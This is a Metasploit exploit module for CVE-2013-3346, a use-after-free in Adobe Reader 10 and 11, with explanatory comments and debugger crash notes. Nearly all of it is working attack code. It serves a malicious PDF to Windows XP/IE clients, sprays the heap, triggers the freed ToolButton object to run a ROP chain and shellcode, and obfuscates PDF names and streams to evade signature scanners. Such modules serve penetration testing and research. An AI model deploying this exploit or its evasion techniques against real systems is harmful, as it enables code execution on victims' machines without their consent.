##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info = {})
  # Module metadata for CVE-2013-3346, a use-after-free in Adobe Reader's
  # ToolButton handling. This variant is served through the browser exploit
  # server as a PDF; the target filter (Windows XP + IE, see
  # BrowserRequirements) and the single target entry are deliberately narrow,
  # and Reader 9 is not handled by make_js (the description points to the
  # fileformat module for that).
  details = {
    'Name' => "Adobe Reader ToolButton Use After Free",
    'Description' => %q{
      This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6
      and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where
      the cEnable callback can be used to early free the object memory. Later use of the object
      allows triggering the use after free condition. This module has been tested successfully
      on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in
      November, 2013. At the moment, this module doesn't support Adobe Reader 9 targets; in order
      to exploit Adobe Reader 9 the fileformat version of the exploit can be used.
    },
    'License' => MSF_LICENSE,
    'Author' => [
      'Soroush Dalili', # Vulnerability discovery
      'Unknown', # Exploit in the wild
      'sinn3r', # Metasploit module
      'juan vazquez' # Metasploit module
    ],
    'References' => [
      [ 'CVE', '2013-3346' ],
      [ 'OSVDB', '96745' ],
      [ 'ZDI', '13-212' ],
      [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ],
      [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ]
    ],
    'Platform' => 'win',
    'Arch' => ARCH_X86,
    # 1 KiB of payload space, NUL excluded, no NOP sled: the payload is
    # carried as a %u-escaped JavaScript string by make_js (the BadChars
    # choice is inherited from the original module; not re-verified here).
    'Payload' => {
      'Space' => 1024,
      'BadChars' => "\x00",
      'DisableNops' => true
    },
    # Fingerprint may come from the JS probe or from headers alone; only
    # Windows XP clients using IE are served the exploit.
    'BrowserRequirements' => {
      :source => /script|headers/i,
      :os_name => OperatingSystems::Match::WINDOWS_XP,
      :ua_name => Msf::HttpClients::IE
    },
    'Targets' => [
      [ 'Windows XP / IE / Adobe Reader 10/11', {} ],
    ],
    'Privileged' => false,
    'DisclosureDate' => '2013-08-08',
    'DefaultTarget' => 0,
    'Notes' => {
      'Reliability' => UNKNOWN_RELIABILITY,
      'Stability' => UNKNOWN_STABILITY,
      'SideEffects' => UNKNOWN_SIDE_EFFECTS
    }
  }
  super(update_info(info, details))
end
def on_request_exploit(cli, request, target_info)
  # Called by the BrowserExploitServer mixin for each request from a client
  # that passed BrowserRequirements. Generates the exploit JavaScript for
  # this client, wraps it in a PDF and returns it as the response body.
  print_status("request: #{request.uri}")
  pdf = make_pdf(make_js(cli, target_info))
  print_status("Sending PDF...")
  headers = { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' }
  send_response(cli, pdf, headers)
end
def make_js(cli, target_info)
  # Build the exploit JavaScript that make_pdf embeds in the document and
  # return it as a String.
  #
  # The Ruby side only prepares three %u-escaped strings (ROP chain for
  # Reader 10, ROP chain for Reader 11, and the stage payload) and
  # interpolates them into the script, which unescape()s them at runtime.
  # The chains come from generate_rop_payload('reader', ...) — presumably
  # the framework ROP database entry for Reader; confirm there.
  #
  # What the script does:
  #  * Gates on app.viewerVersion: 10.0 .. 10.1.6 (10.106) and 11.0 .. 11.0.2
  #    (11.002) get per-version constants (object size, pivot address,
  #    gadget address); anything else does nothing.
  #  * heapSpray(): builds a large block that is mostly 0x0c0c filler with
  #    str_addr and then str (rop + shellcode) at fixed offsets derived from
  #    r_addr and 0x0c0c, and allocates 0x1f0 copies so the predictable
  #    address 0x0c0c0c0c (the crash address in the notes at the end of this
  #    file) lands inside the sprayed data.
  #  * Trigger: a tool button "evil" whose cEnable callback adds a second
  #    button "xxx", whose cEnable callback removes "evil" and immediately
  #    allocates ten strings of obj_size bytes (part1 + part2) to reoccupy the
  #    freed object; part1 carries rop_addr at the slot Reader later
  #    dereferences. Reader 10 needs 0x1c bytes of padding before it, Reader
  #    11 does not (the r11 flag).
  # `var executable = ""` is unused and kept as in the original.

  # CreateFileMappingA + MapViewOfFile + memcpy rop chain
  rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' }))
  rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))
  escaped_payload = Rex::Text.to_unescape(get_payload(cli, target_info))

  js = %Q|
    function heapSpray(str, str_addr, r_addr) {
      var aaa = unescape("%u0c0c");
      aaa += aaa;
      while ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa;
      var i1 = r_addr - 0x24;
      var bbb = aaa.substring(0, i1 / 2);
      var sa = str_addr;
      while (sa.length < (0x0c0c - r_addr)) sa += sa;
      bbb += sa;
      bbb += aaa;
      var i11 = 0x0c0c - 0x24;
      bbb = bbb.substring(0, i11 / 2);
      bbb += str;
      bbb += aaa;
      var i2 = 0x4000 + 0xc000;
      var ccc = bbb.substring(0, i2 / 2);
      while (ccc.length < (0x40000 + 0x40000)) ccc += ccc;
      var i3 = (0x1020 - 0x08) / 2;
      var ddd = ccc.substring(0, 0x80000 - i3);
      var eee = new Array();
      for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s";
      return;
    }
    var shellcode = unescape("#{escaped_payload}");
    var executable = "";
    var rop10 = unescape("#{rop_10}");
    var rop11 = unescape("#{rop_11}");
    var r11 = false;
    var vulnerable = true;

    var obj_size;
    var rop;
    var ret_addr;
    var rop_addr;
    var r_addr;

    if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) {
      obj_size = 0x360 + 0x1c;
      rop = rop10;
      rop_addr = unescape("%u08e4%u0c0c");
      r_addr = 0x08e4;
      ret_addr = unescape("%ua8df%u4a82");
    } else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) {
      r11 = true;
      obj_size = 0x370;
      rop = rop11;
      rop_addr = unescape("%u08a8%u0c0c");
      r_addr = 0x08a8;
      ret_addr = unescape("%u8003%u4a84");
    } else {
      vulnerable = false;
    }

    if (vulnerable) {
      var payload = rop + shellcode;
      heapSpray(payload, ret_addr, r_addr);

      var part1 = "";
      if (!r11) {
        for (i = 0; i < 0x1c / 2; i++) part1 += unescape("%u4141");
      }
      part1 += rop_addr;
      var part2 = "";
      var part2_len = obj_size - part1.length * 2;
      for (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape("%u4141");
      var arr = new Array();

      removeButtonFunc = function () {
        app.removeToolButton({
          cName: "evil"
        });

        for (i = 0; i < 10; i++) arr[i] = part1.concat(part2);
      }

      addButtonFunc = function () {
        app.addToolButton({
          cName: "xxx",
          cExec: "1",
          cEnable: "removeButtonFunc();"
        });
      }

      app.addToolButton({
        cName: "evil",
        cExec: "1",
        cEnable: "addButtonFunc();"
      });
    }
  |

  # The generated script is returned to the caller (on_request_exploit),
  # which hands it to make_pdf.
  js
end
def random_non_ascii_string(count)
  # Return `count` random bytes, each in 0x80..0xFF, as a binary String.
  # make_pdf writes these right after the "%PDF-1.5" header as a comment
  # line of high bytes, so the file is treated as binary data. A count of
  # zero (or less) yields an empty string.
  count.times.map { rand(0x80..0xff).chr }.join
end
def io_def(id)
  # Opening line of indirect object `id` (generation 0): "<id> 0 obj " plus
  # a newline. The trailing space before the newline is intentional and is
  # part of the byte layout make_pdf's xref offsets are computed over.
  format('%d 0 obj ', id) << "\n"
end
def io_ref(id)
  # Indirect reference to object `id`, generation 0: "<id> 0 R".
  format('%d 0 R', id)
end
# http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
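def n_obfu(str)
  # Lightly obfuscate a PDF dictionary/name fragment by rewriting roughly
  # half of its ASCII letters as name hex escapes ("#41" for "A"), the
  # encoding PDF allows inside name tokens (/Type -> /T#79pe). The result
  # parses identically but the keyword bytes differ per call, which defeats
  # naive signature matching on the dictionary text (see the Didier Stevens
  # post linked above). Only use it on text whose letters all sit inside
  # name objects, as make_pdf does; digits, delimiters and whitespace pass
  # through untouched. Output is randomized per call.
  #
  # Previously iterated with scan(/./u), which silently dropped newline
  # characters, and tested c.upcase against 'A'..'Z' by string comparison,
  # which also matched some non-ASCII letters (e.g. "ß".upcase == "SS") and
  # then emitted only their first byte; both are fixed by matching ASCII
  # letters explicitly over each_char.
  # (To disable obfuscation while debugging, return str here.)
  str.each_char.map do |c|
    if /[A-Za-z]/.match?(c) && rand(2).zero?
      format('#%x', c.ord)
    else
      c
    end
  end.join
end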
def ascii_hex_whitespace_encode(str)
  # ASCIIHexDecode-encode `str`: two lowercase hex digits per byte, a random
  # run of one to three spaces between consecutive bytes (the ASCIIHex filter
  # ignores whitespace, so this varies the stream bytes per call without
  # changing what decodes), and the '>' end-of-data marker last. Nothing is
  # emitted before the first byte; an empty input yields just ">".
  encoded = "".dup
  str.each_byte.with_index do |byte, idx|
    encoded << " " * rand(1..3) unless idx.zero?
    encoded << format('%02x', byte)
  end
  encoded << ">"
end
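def make_pdf(js)
  # Assemble the malicious PDF that carries `js` (the exploit JavaScript
  # from make_js) and return it as a String.
  #
  # Object layout (all generation 0):
  #   1  Catalog: /OpenAction -> 4 makes the viewer run the script when the
  #      document is opened; /AcroForm -> 6 pulls in the XFA form below.
  #   2  Pages and 3 Page: the minimal page tree a viewer needs.
  #   4  JavaScript action pointing at stream 5.
  #   5  The script, ASCIIHex-encoded with random whitespace and then
  #      Flate-compressed; the filter array lists the decode order (inflate,
  #      then ASCIIHex), so the raw stream bytes differ on every request.
  #   6  AcroForm with /XFA -> 7, and 7 a tiny XFA package. The original
  #      author's note says the form data is what makes Reader load
  #      icucnv36.dll / icucnv40.dll; presumably that DLL supplies the ROP
  #      gadgets make_js uses, which cannot be verified from this file.
  # Dictionary text goes through n_obfu, which hex-escapes letters inside
  # name tokens so the keyword bytes vary per request as well.
  #
  # Cross-reference offsets, the startxref value and stream /Length values
  # must be byte counts. The earlier code used String#length, which only
  # agreed with the byte count because appending the binary comment line
  # switches the buffer to ASCII-8BIT; bytesize is used here so the offsets
  # stay correct regardless of the buffer's encoding.
  xref = []
  eol = "\n"
  endobj = "endobj#{eol}"

  # Randomize PDF version?
  pdf = "%PDF-1.5#{eol}"
  # Comment line of four high bytes right after the header, marking the
  # file as binary data.
  pdf << "%" << random_non_ascii_string(4) << eol

  # catalog
  xref << pdf.bytesize
  pdf << io_def(1) << n_obfu("<<") << eol
  pdf << n_obfu("/Pages ") << io_ref(2) << eol
  pdf << n_obfu("/Type /Catalog") << eol
  pdf << n_obfu("/OpenAction ") << io_ref(4) << eol
  # The AcroForm is required to get icucnv36.dll / icucnv40.dll to load
  pdf << n_obfu("/AcroForm ") << io_ref(6) << eol
  pdf << n_obfu(">>") << eol
  pdf << endobj

  # pages array
  xref << pdf.bytesize
  pdf << io_def(2) << n_obfu("<<") << eol
  pdf << n_obfu("/Kids [") << io_ref(3) << "]" << eol
  pdf << n_obfu("/Count 1") << eol
  pdf << n_obfu("/Type /Pages") << eol
  pdf << n_obfu(">>") << eol
  pdf << endobj

  # page 1
  xref << pdf.bytesize
  pdf << io_def(3) << n_obfu("<<") << eol
  pdf << n_obfu("/Parent ") << io_ref(2) << eol
  pdf << n_obfu("/Type /Page") << eol
  pdf << n_obfu(">>") << eol # end obj dict
  pdf << endobj

  # js action
  xref << pdf.bytesize
  pdf << io_def(4) << n_obfu("<<")
  pdf << n_obfu("/Type/Action/S/JavaScript/JS ") + io_ref(5)
  pdf << n_obfu(">>") << eol
  pdf << endobj

  # js stream: hex-with-whitespace first, then deflate, so /Length is the
  # size of the compressed bytes actually written between stream/endstream.
  xref << pdf.bytesize
  compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
  pdf << io_def(5) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.bytesize) << eol
  pdf << "stream" << eol
  pdf << compressed << eol
  pdf << "endstream" << eol
  pdf << endobj

  ###
  # The following form related data is required to get icucnv36.dll / icucnv40.dll to load
  ###

  # form object
  xref << pdf.bytesize
  pdf << io_def(6)
  pdf << n_obfu("<</XFA ") << io_ref(7) << n_obfu(">>") << eol
  pdf << endobj

  # form stream (ASCII only; <<~ strips the source indentation)
  xfa = <<~EOF
    <?xml version="1.0" encoding="UTF-8"?>
    <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
    <config xmlns="http://www.xfa.org/schema/xci/2.6/">
    <present><pdf><interactive>1</interactive></pdf></present>
    </config>
    <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
    <subform name="form1" layout="tb" locale="en_US">
    <pageSet></pageSet>
    </subform></template></xdp:xdp>
  EOF

  xref << pdf.bytesize
  pdf << io_def(7) << n_obfu("<</Length %s>>" % xfa.bytesize) << eol
  pdf << "stream" << eol
  pdf << xfa << eol
  pdf << "endstream" << eol
  pdf << endobj

  ###
  # end form stuff for icucnv36.dll / icucnv40.dll
  ###

  # Cross-reference table and trailer. Each entry is written with a bare
  # "\n", i.e. 19 bytes rather than the 20 the PDF spec prescribes
  # ("nnnnnnnnnn ggggg n" plus a two-byte EOL such as " \n"). Reader accepts
  # this and it is the layout that was tested in the wild, so it is left
  # unchanged rather than "fixed" blind; do not alter it without retesting.
  xref_position = pdf.bytesize
  pdf << "xref" << eol
  pdf << format('0 %d', xref.length + 1) << eol
  pdf << "0000000000 65535 f" << eol
  xref.each do |offset|
    pdf << format('%010d 00000 n', offset) << eol
  end

  pdf << "trailer" << eol
  pdf << n_obfu(format('<</Size %d/Root ', xref.length + 1)) << io_ref(1) << ">>" << eol

  pdf << "startxref" << eol
  pdf << xref_position.to_s << eol

  pdf << "%%EOF" << eol
  pdf
end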
end
=begin

Crash notes (WinDbg, first-chance exceptions). In both traces eax holds the
value the script writes into the reoccupied object (0x0c0c08e4 / 0x0c0c08a8,
the rop_addr constants in make_js) and eax plus the vtable-style offset
(0x328 / 0x364) resolves to 0x0c0c0c0c, the address the heap spray is laid
out to cover.

* crash Adobe Reader 10.1.4

First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001
eip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213
AcroRd32_60000000!PDFLTerm+0xbb7cd:
604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=????????

* crash Adobe Reader 11.0.2

(940.d70): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.dll -
eax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000
eip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213
AcroRd32_60000000!DllCanUnloadNow+0x1493ae:
60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=????????

=end